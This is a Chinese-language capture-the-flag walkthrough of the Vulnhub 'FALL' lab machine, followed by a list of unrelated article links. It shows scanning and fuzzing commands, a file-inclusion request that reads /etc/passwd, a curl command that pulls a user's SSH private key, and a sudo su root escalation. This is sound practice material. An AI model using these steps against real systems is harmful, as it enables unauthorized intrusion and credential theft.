当前位置: 首页 > news >正文

Vulnhub:Digitalword.local: FALL靶机渗透

 将靶机按照图中连接方式打开,fall在virtualBox中打开

 信息收集

 扫描得ip

arp-scan -l

 扫描端口

nmap -A -T4 -sV -p-

 扫描目录

gobuster dir -u http://192.168.117.160 -x php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

 一个一个试了后,在test.php发现提示缺少参数

 使用wfuzz爆破参数

wfuzz -u "http://192.168.56.101/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80 

扫出来了一个file参数给file参数传一个"/etc/passwd",发现正常回显了,是文件包含漏洞.并且在这个passwd文件里还发现了一个qiu用户

http://192.168.2.128/test.php?file=/etc/passwd

 尝试利用文件包含来把qiu的ssh私钥显示出来,并且试着导出这个私钥文件

curl http://192.168.56.101/test.php?file=/home/qiu/.ssh/id_rsa > sa

 

 因为openssh的安全性,密钥文件权限需要给600才能够正常使用

 chmod 600 sa

 

 ls -al

 显示可以运行

 

 使用私钥登录qiu用户

 

 查看.bash_history历史记录文件

 发现密码"remarkablyawesomE",用"sudo -l"看一下权限 

图中密码输入没显示出来,发现密码正确,并且拥有全部的sudo权限

 用"sudo su"命令提权

查看flag文件 

cat ~/remarks.txt

 

相关文章:

  • 海拔案例分享-新华书店新零售系统开发解决方案
  • 自然语言处理,能否成为人工智能与人类语言完美交互的答案?
  • HTML~视频音频在网页中不能自动播放
  • 项目-苍穹外卖(十五) Apache ECharts+数据统计
  • 腾讯混元 T1 正式发布:混合架构重塑推理模型范式,解码速度提升 2 倍
  • java项目之基于ssm的新生报到系统(源码+文档)
  • 向内求解人生
  • Socket函数用法详解
  • 人工智能技术全景图谱:从基础理论到前沿应用
  • Java-servlet(八)详细讲解get请求和post请求的区别,get请求和post请求分别在哪种场景使用
  • 数据结构——单链表(C语言)
  • 《Operating System Concepts》阅读笔记:p489-p489
  • 编译原理——自底向上语法优先分析
  • linux中如何获取其他进程的退出状态
  • 交通数据集
  • leetcode日常刷题
  • 如何对AI玩家进行改进
  • QT错误集合
  • 人工智能与网络安全
  • 动态内存分配与内存对齐
  • 泉州网站建设方案外包/设计网站排行
  • 做网站的规范/北京快速优化排名
  • 现在还有网站做校内网吗/seo优化网站的注意事项
  • 国外自助建站/收录之家
  • 合肥市城市建设委员会网站/aso优化师工作很赚钱吗
  • vs2017移动网站开发/苏州网站